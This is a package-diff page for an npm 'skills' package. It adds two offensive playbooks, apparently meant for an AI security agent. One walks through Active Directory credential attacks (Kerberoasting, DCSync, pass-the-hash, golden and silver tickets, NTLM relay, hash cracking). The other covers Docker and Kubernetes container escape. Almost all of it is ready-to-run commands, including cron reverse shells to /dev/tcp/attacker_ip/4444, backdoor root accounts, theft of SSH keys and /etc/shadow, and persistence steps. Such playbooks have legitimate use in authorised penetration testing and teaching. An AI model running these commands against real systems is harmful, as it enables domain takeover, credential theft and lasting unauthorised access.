npm - @aegis-scan/skills - Versions diffs - 0.5.0 → 0.5.1 - Mend

@aegis-scan/skills 0.5.0 → 0.5.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (346) hide show

package/skills/offensive/airecon-fork/postexploit-ad-credential-attacks/SKILL.md ADDED Viewed

@@ -0,0 +1,306 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+# Active Directory Credential Attacks
+Step-by-step: Kerberoasting, AS-REP Roasting, DCSync, Pass-the-Hash, Pass-the-Ticket, Silver Ticket, Golden Ticket.
+All via Impacket + netexec (CLI, no Windows required).
+## Install
+```bash
+pip install impacket --break-system-packages
+sudo apt-get install -y krb5-user
+# hashcat or john for cracking:
+sudo apt-get install -y hashcat john
+```
+---
+## Phase 1: Kerberoasting
+```bash
+# Request TGS tickets for accounts with SPNs → crack offline
+# Requires: any valid domain account
+# Method 1: Impacket GetUserSPNs:
+GetUserSPNs.py 'DOMAIN.COM/user:password' -dc-ip <DC_IP> -request
+# Save to file for cracking:
+GetUserSPNs.py 'DOMAIN.COM/user:password' -dc-ip <DC_IP> -request \
+  -outputfile kerberoast_hashes.txt
+# Method 2: with NTLM hash:
+GetUserSPNs.py 'DOMAIN.COM/user' -hashes ':NTHASH' \
+  -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt
+# Method 3: Kerberos ticket (no password):
+KRB5CCNAME=/tmp/user.ccache GetUserSPNs.py 'DOMAIN.COM/user' \
+  -dc-ip <DC_IP> -k -no-pass -request
+# Crack with hashcat:
+hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
+hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
+# Crack with john:
+john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
+# RC4 vs AES:
+# $krb5tgs$23$* = RC4 (faster to crack, hashcat mode 13100)
+# $krb5tgs$18$* = AES256 (slower, mode 19700)
+# $krb5tgs$17$* = AES128 (mode 19600)
+# Force RC4 downgrade:
+GetUserSPNs.py 'DOMAIN.COM/user:password' -dc-ip <DC_IP> -request -request-user svc_account
+```
+---
+## Phase 2: AS-REP Roasting
+```bash
+# Request AS-REP for accounts with "Do not require Kerberos pre-authentication"
+# Does NOT require valid credentials — works unauthenticated if you know usernames
+# Method 1: Unauthenticated (need username list):
+GetNPUsers.py 'DOMAIN.COM/' -usersfile usernames.txt -dc-ip <DC_IP> -no-pass -format hashcat
+# Method 2: Authenticated (auto-enumerate vulnerable accounts):
+GetNPUsers.py 'DOMAIN.COM/user:password' -dc-ip <DC_IP> -request -format hashcat
+# Output:
+# $krb5asrep$23$USER@DOMAIN.COM:...
+# Crack with hashcat:
+hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
+hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -r best64.rule
+# Crack with john:
+john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
+```
+---
+## Phase 3: DCSync (Extract All Hashes)
+```bash
+# Dump NTLM hashes for ALL users from Domain Controller
+# Requires: GenericAll/WriteDacl/Replication rights on domain object OR Domain Admin
+# Full domain dump:
+secretsdump.py 'DOMAIN.COM/admin:password@<DC_IP>'
+# With NTLM hash:
+secretsdump.py -hashes ':NTHASH' 'DOMAIN.COM/admin@<DC_IP>'
+# With Kerberos ticket:
+KRB5CCNAME=/tmp/admin.ccache secretsdump.py -k -no-pass 'DOMAIN.COM/admin@dc01.domain.com'
+# Specific user only:
+secretsdump.py 'DOMAIN.COM/admin:password@<DC_IP>' -just-dc-user krbtgt
+secretsdump.py 'DOMAIN.COM/admin:password@<DC_IP>' -just-dc-user administrator
+# Output format:
+# domain\user:RID:LMHASH:NTHASH:::
+# administrator:500:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+# Dump NTDS.dit offline (if you have file access):
+secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
+# Historical passwords (old hashes):
+secretsdump.py 'DOMAIN.COM/admin:password@<DC_IP>' -history
+```
+---
+## Phase 4: Pass-the-Hash (PtH)
+```bash
+# Authenticate using NTLM hash instead of plaintext password
+# Works for local admin accounts and domain accounts on older systems
+# psexec (remote shell):
+psexec.py -hashes ':NTHASH' 'DOMAIN.COM/administrator@<TARGET_IP>'
+# wmiexec (WMI-based shell, quieter):
+wmiexec.py -hashes ':NTHASH' 'DOMAIN.COM/administrator@<TARGET_IP>'
+# smbexec (SMB shell):
+smbexec.py -hashes ':NTHASH' 'DOMAIN.COM/administrator@<TARGET_IP>'
+# atexec (run command via Task Scheduler):
+atexec.py -hashes ':NTHASH' 'DOMAIN.COM/administrator@<TARGET_IP>' "whoami"
+# SMB share access:
+smbclient.py -hashes ':NTHASH' 'DOMAIN.COM/administrator@<TARGET_IP>'
+# netexec PtH:
+netexec smb <TARGET_IP> -u administrator -H 'NTHASH' --exec-method wmiexec -x "whoami"
+netexec smb 10.10.10.0/24 -u administrator -H 'NTHASH'  # spray across subnet
+# PtH via RDP (requires Restricted Admin Mode enabled):
+xfreerdp /v:<TARGET_IP> /u:administrator /pth:NTHASH /cert:ignore +clipboard
+```
+---
+## Phase 5: Pass-the-Ticket (PtT)
+```bash
+# Use Kerberos TGT/TGS ticket for authentication
+# Obtain ticket from: mimikatz, rubeus, or impacket
+# Request TGT with credentials:
+getTGT.py 'DOMAIN.COM/user:password' -dc-ip <DC_IP>
+# Creates: user.ccache
+# Request TGT with hash (overpass-the-hash):
+getTGT.py 'DOMAIN.COM/user' -hashes ':NTHASH' -dc-ip <DC_IP>
+# Use ticket:
+export KRB5CCNAME=/tmp/user.ccache
+klist   # verify ticket loaded
+# Now all Kerberos tools use this ticket:
+smbclient.py -k -no-pass 'DOMAIN.COM/user@server.domain.com'
+wmiexec.py -k -no-pass 'DOMAIN.COM/user@server.domain.com'
+# Get TGS for specific service (S4U2Self):
+getST.py 'DOMAIN.COM/computer$' -spn 'cifs/target.domain.com' \
+  -hashes ':NTHASH' -impersonate Administrator -dc-ip <DC_IP>
+export KRB5CCNAME=Administrator@cifs_target.domain.com@DOMAIN.COM.ccache
+smbclient.py -k -no-pass 'DOMAIN.COM/Administrator@target.domain.com'
+```
+---
+## Phase 6: Silver Ticket
+```bash
+# Forge TGS for a specific service using service account NTLM hash
+# Requires: service account hash (from secretsdump), domain SID
+# Get domain SID:
+getPac.py 'DOMAIN.COM/user:password' -dc-ip <DC_IP>
+# OR: ldapsearch → objectSid of domain object
+lookupsid.py 'DOMAIN.COM/user:password@<DC_IP>'
+# Extract: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX
+# Forge silver ticket:
+ticketer.py -nthash <SERVICE_NTHASH> \
+  -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \
+  -domain DOMAIN.COM \
+  -spn cifs/server.domain.com \
+  administrator   # user to impersonate
+# Creates: administrator.ccache
+# Use silver ticket:
+export KRB5CCNAME=administrator.ccache
+smbclient.py -k -no-pass 'DOMAIN.COM/administrator@server.domain.com'
+# Access CIFS on server as administrator
+# Common service SPNs:
+# cifs/server.domain.com   → SMB/file shares
+# host/server.domain.com   → WMI/scheduled tasks
+# http/server.domain.com   → IIS/web service
+# mssql/server.domain.com  → SQL Server
+```
+---
+## Phase 7: Golden Ticket
+```bash
+# Forge TGT using KRBTGT hash → persistent DA access
+# Requires: KRBTGT NTLM hash (from DCSync), domain SID
+# Get KRBTGT hash:
+secretsdump.py 'DOMAIN.COM/admin:password@<DC_IP>' -just-dc-user krbtgt
+# Save NTHASH: e.g. 82cbba3c1ac9c4fd12d6428c3ed28611
+# Get domain SID:
+lookupsid.py 'DOMAIN.COM/admin:password@<DC_IP>' | grep "DOMAIN SID"
+# S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX
+# Forge golden ticket:
+ticketer.py -nthash 82cbba3c1ac9c4fd12d6428c3ed28611 \
+  -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \
+  -domain DOMAIN.COM \
+  administrator   # any username (even nonexistent)
+# Creates: administrator.ccache (valid for 10 years by default)
+# Use golden ticket:
+export KRB5CCNAME=administrator.ccache
+psexec.py -k -no-pass 'DOMAIN.COM/administrator@dc01.domain.com'
+secretsdump.py -k -no-pass 'DOMAIN.COM/administrator@dc01.domain.com'
+# Full domain compromise:
+secretsdump.py -k -no-pass 'DOMAIN.COM/administrator@dc01.domain.com' -just-dc-ntlm
+```
+---
+## Phase 8: NTLM Relay Attack
+```bash
+# Capture and relay NTLM auth to authenticate as the victim
+# Requires: Responder + ntlmrelayx (impacket)
+# Step 1: Disable SMB/HTTP in Responder:
+sed -i 's/SMB = On/SMB = Off/;s/HTTP = On/HTTP = Off/' /etc/responder/Responder.conf
+# Step 2: Run Responder to capture hashes:
+python3 /opt/Responder/Responder.py -I eth0 -v
+# Step 3: Run ntlmrelayx to relay:
+ntlmrelayx.py -tf targets.txt -smb2support   # relay to target list
+ntlmrelayx.py -t smb://<TARGET_IP> -smb2support   # relay to specific target
+ntlmrelayx.py -t smb://<TARGET_IP> -smb2support -i   # interactive shell
+ntlmrelayx.py -t ldap://<DC_IP> --delegate-access    # delegate access
+# NTLM relay to LDAP (create new admin account):
+ntlmrelayx.py -t ldap://<DC_IP> -smb2support --add-computer NEWPC$ P@ssw0rd123
+# Then add NEWPC$ to desired group
+# Targets file (one per line):
+cat targets.txt
+# 10.10.10.1
+# 10.10.10.2
+```
+---
+## Hash Cracking Reference
+```bash
+# Crack NTLM hash:
+hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
+hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r best64.rule
+# Crack NTLMv2 (from Responder):
+hashcat -m 5600 netntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
+# Crack Kerberoast (RC4):
+hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
+# Crack AS-REP:
+hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
+# Rules for better coverage:
+hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
+hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/d3adhob0.rule
+hashcat -m 1000 hashes.txt -a 3 '?u?l?l?l?l?d?d?d'  # mask attack
+```
+---
+## Pro Tips
+1. **Kerberoasting order**: RC4 accounts crack fastest → target admincount=1 users first
+2. **AS-REP unauthenticated**: doesn't need creds → try with username list before getting valid account
+3. **DCSync** = most valuable → run immediately when DA/replication rights obtained
+4. **Silver ticket** → more stealthy than golden (no DC contact during authentication)
+5. **Golden ticket** → persists even after password change (until KRBTGT rotated twice)
+6. **PtH vs PtT**: PtH uses NTLM auth, PtT uses Kerberos — PtT bypasses NTLM-restricted targets
+7. **NTLM relay** → most effective in flat networks; requires non-signing SMB targets (`--gen-relay-list` with netexec)
+## Summary
+AD credential attack flow: enumerate SPNs → Kerberoast → crack RC4 tickets → check admincount=1 users for AS-REP → if DA reached: DCSync for KRBTGT hash → forge golden ticket for persistence → use silver tickets for service-specific stealth access.

package/skills/offensive/airecon-fork/postexploit-container-escape/SKILL.md ADDED Viewed

@@ -0,0 +1,299 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+# Container Escape & Docker Breakout
+Techniques to escape Docker/container isolation and gain access to the host system.
+Applies to: privileged containers, misconfigured mounts, writable cgroup, exposed Docker socket, runc vulnerabilities.
+## Install
+```bash
+# Tools available inside container:
+# Standard: ls, cat, mount, id, capsh, nsenter, chroot
+# May need to install:
+apt-get install -y libcap2-bin   # for capsh/getcap
+apt-get install -y util-linux    # for nsenter, unshare
+# On host (if you escape):
+# All tools available
+```
+---
+## Phase 1: Container Environment Recon
+```bash
+# Am I in a container?
+cat /proc/1/cgroup | grep -i "docker\|kubepods\|containerd"
+ls /.dockerenv          # exists in Docker containers
+cat /etc/hostname       # usually short random hash
+# Container runtime:
+cat /proc/1/environ | tr '\0' '\n' | grep -i "CONTAINER\|KUBERNETES\|DOCKER"
+# Check capabilities (critical):
+capsh --print
+cat /proc/self/status | grep -i "cap"
+# Look for: cap_sys_admin, cap_net_admin, cap_dac_override, cap_setuid
+# Check if privileged:
+ip link       # can modify interfaces = privileged
+mount         # full mount list = privileged
+ls /dev/      # /dev/sda*, /dev/mem visible = privileged
+# Seccomp status:
+cat /proc/self/status | grep Seccomp   # 0=disabled, 1=strict, 2=filter
+# AppArmor profile:
+cat /proc/self/attr/current
+```
+---
+## Phase 2: Escape via Privileged Container
+```bash
+# Privileged containers have ALL capabilities and full /dev access
+# Method 1: Mount host filesystem via /dev/sda:
+fdisk -l 2>/dev/null   # find host disk
+mkdir /mnt/host
+mount /dev/sda1 /mnt/host   # mount host root
+# Read host files:
+cat /mnt/host/etc/shadow
+cat /mnt/host/root/.ssh/id_rsa
+# Chroot to host (full shell):
+chroot /mnt/host /bin/bash
+id   # should be root on host
+# Method 2: Mount host proc:
+nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
+# --target 1 = PID 1 (host init process)
+# This gives full host namespace access
+# Method 3: Write cron job to host:
+mount /dev/sda1 /mnt/host
+echo "* * * * * root /bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1" >> /mnt/host/etc/cron.d/backdoor
+```
+---
+## Phase 3: Escape via Docker Socket
+```bash
+# Check for mounted Docker socket:
+ls -la /var/run/docker.sock   # if exists → full Docker API access
+ls -la /run/docker.sock
+# Use Docker CLI to create privileged container on HOST:
+docker -H unix:///var/run/docker.sock run -it \
+  --privileged \
+  --pid=host \
+  --net=host \
+  -v /:/mnt/host \
+  ubuntu:latest /bin/bash
+# Inside new container: host / is at /mnt/host
+chroot /mnt/host /bin/bash
+id   # root on host
+# Without Docker CLI (raw API):
+curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | python3 -m json.tool | grep RepoTags
+# Create container via API:
+curl -s --unix-socket /var/run/docker.sock \
+  -X POST "http://localhost/containers/create" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "Image": "ubuntu",
+    "Cmd": ["/bin/sh", "-c", "cat /mnt/root/.ssh/id_rsa"],
+    "Binds": ["/:/mnt/root:rw"],
+    "Privileged": true
+  }' | python3 -m json.tool
+# Start and get logs:
+CONTAINER_ID=$(...)
+curl -s --unix-socket /var/run/docker.sock -X POST "http://localhost/containers/$CONTAINER_ID/start"
+curl -s --unix-socket /var/run/docker.sock "http://localhost/containers/$CONTAINER_ID/logs?stdout=1&stderr=1"
+```
+---
+## Phase 4: Escape via cgroup v1 Release Agent
+```bash
+# Requires: SYS_ADMIN capability or privileged, cgroup v1 (pre-2022 systems)
+# Check if exploitable:
+cat /proc/1/cgroup   # should show cgroup v1 path
+ls /sys/fs/cgroup/   # look for 'memory' or 'devices' directories
+# Exploit:
+mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
+mkdir /tmp/cgrp/x
+# Enable notify_on_release:
+echo 1 > /tmp/cgrp/x/notify_on_release
+# Get container path on host:
+host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+# Write command to execute on host:
+echo '#!/bin/sh' > /cmd
+echo "id > $host_path/output" >> /cmd   # writes to container-visible path
+chmod +x /cmd
+# Trigger release agent:
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+# Check output:
+cat /output   # contains 'uid=0(root)' on host
+# Reverse shell version:
+echo '#!/bin/sh' > /cmd
+echo "bash -i >& /dev/tcp/attacker_ip/4444 0>&1" >> /cmd
+chmod +x /cmd
+```
+---
+## Phase 5: Escape via Writable /etc/cron, /etc/passwd, authorized_keys
+```bash
+# If /etc is mounted from host (common in dev environments):
+mount | grep /etc   # shows host bind mount
+# Add root user to /etc/passwd:
+echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash' >> /etc/passwd
+# Password: hacker
+# Write SSH key to root authorized_keys:
+mkdir -p /root/.ssh
+echo "ssh-rsa AAAA... attacker@kali" >> /root/.ssh/authorized_keys
+chmod 600 /root/.ssh/authorized_keys
+# If /etc/cron.d is writable:
+echo "* * * * * root bash -i >& /dev/tcp/attacker_ip/4444 0>&1" > /etc/cron.d/backdoor
+```
+---
+## Phase 6: Escape via Kernel Vulnerability
+```bash
+# Check kernel version:
+uname -r   # e.g. 4.15.0
+# Known container escape CVEs:
+# CVE-2022-0492: cgroup v1 release_agent escape (covered in Phase 4)
+# CVE-2022-0185: heap overflow in legacy_parse_param
+# CVE-2021-3493: ubuntu overlayfs privilege escalation
+# CVE-2019-5736: runc container escape (overwrites /proc/self/exe)
+# CVE-2019-14271: Docker copy escape via nsswitch
+# Check runc version:
+runc --version 2>/dev/null
+docker version 2>/dev/null
+# CVE-2019-5736 (runc < 1.0-rc6) — overwrite runc binary:
+# Inside container with write access:
+cat /proc/self/exe   # points to runc binary on host
+# Overwrite via /proc/self/exe symlink
+```
+---
+## Phase 7: Kubernetes Escape
+```bash
+# Inside Kubernetes pod:
+# Check service account token:
+cat /var/run/secrets/kubernetes.io/serviceaccount/token
+cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+KUBE_API="https://kubernetes.default.svc"
+TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+# Query Kubernetes API:
+curl -sk -H "Authorization: Bearer $TOKEN" "$KUBE_API/api/v1/namespaces"
+curl -sk -H "Authorization: Bearer $TOKEN" "$KUBE_API/api/v1/secrets"
+# List cluster-admin privileges:
+curl -sk -H "Authorization: Bearer $TOKEN" \
+  "$KUBE_API/apis/authorization.k8s.io/v1/selfsubjectaccessreviews" \
+  -X POST -H "Content-Type: application/json" \
+  -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"verb":"*","resource":"*"}}}'
+# If cluster-admin: create privileged pod for escape
+kubectl --token="$TOKEN" --server="$KUBE_API" --insecure-skip-tls-verify \
+  run escape --image=ubuntu --privileged=true --restart=Never \
+  --overrides='{"spec":{"hostPID":true,"hostNetwork":true,"hostIPC":true,"volumes":[{"name":"host","hostPath":{"path":"/"}}],"containers":[{"name":"escape","image":"ubuntu","command":["/bin/bash","-c","chroot /mnt/host /bin/bash"],"volumeMounts":[{"name":"host","mountPath":"/mnt/host"}],"securityContext":{"privileged":true}}]}}' \
+  -- /bin/bash
+# IDOR in kubelet API (port 10250):
+curl -sk "https://<node-ip>:10250/pods"
+curl -sk "https://<node-ip>:10250/run/<namespace>/<pod>/<container>" \
+  -d "cmd=id"
+```
+---
+## Phase 8: Post-Escape Persistence
+```bash
+# Once on host as root:
+# 1. Add backdoor user:
+useradd -m -s /bin/bash -G sudo hacker
+echo 'hacker:Password123!' | chpasswd
+# 2. SSH key:
+mkdir -p /root/.ssh
+echo "ssh-rsa AAAA... attacker" >> /root/.ssh/authorized_keys
+chmod 700 /root/.ssh && chmod 600 /root/.ssh/authorized_keys
+# 3. Cron reverse shell:
+echo "*/5 * * * * root bash -i >& /dev/tcp/attacker_ip/4444 0>&1" >> /etc/cron.d/sysupdate
+# 4. Disable iptables (if applicable):
+iptables -F && iptables -X
+# 5. Check for other containers / pivot:
+docker ps -a          # other containers on this host
+docker network ls     # internal networks
+ip route              # host routing table
+```
+---
+## Quick Reference — Privilege Checks
+```bash
+# One-liner: check all container security:
+echo "=== Capabilities ===" && capsh --print 2>/dev/null
+echo "=== Privileged ===" && cat /proc/self/status | grep -E "^Cap"
+echo "=== Docker socket ===" && ls -la /var/run/docker.sock 2>/dev/null
+echo "=== Cgroup ===" && cat /proc/1/cgroup | head -5
+echo "=== Mounts ===" && mount | grep -v "proc\|sys\|dev\|cgroup" | head -10
+echo "=== Kernel ===" && uname -r
+echo "=== Env ===" && env | grep -iE "DOCKER|KUBERNETES|CONTAINER"
+```
+---
+## Pro Tips
+1. **Docker socket = game over** — `/var/run/docker.sock` gives full host root without any exploit
+2. **Privileged + nsenter** — `nsenter --target 1 --mount --uts --ipc --net --pid` = immediate host shell
+3. **cgroup v1 escape** — works on most pre-2022 Docker setups without privileged mode (just SYS_ADMIN)
+4. **k8s service account token** — try `curl $KUBE_API/api/v1/secrets` — often reveals other service credentials
+5. **Check /proc/1/root** — symlink to host root filesystem accessible without mounting
+6. **Writable host mounts** — `mount | grep 'on /etc\|on /var\|on /home'` — any bind mount from host is escape vector
+## Summary
+Container escape flow: `capsh --print` + `ls /var/run/docker.sock` + `mount | grep /` → identify vector (privileged/socket/cgroup/kernel CVE) → use appropriate technique → `chroot /mnt/host /bin/bash` or `nsenter --target 1 --all` → establish persistence on host.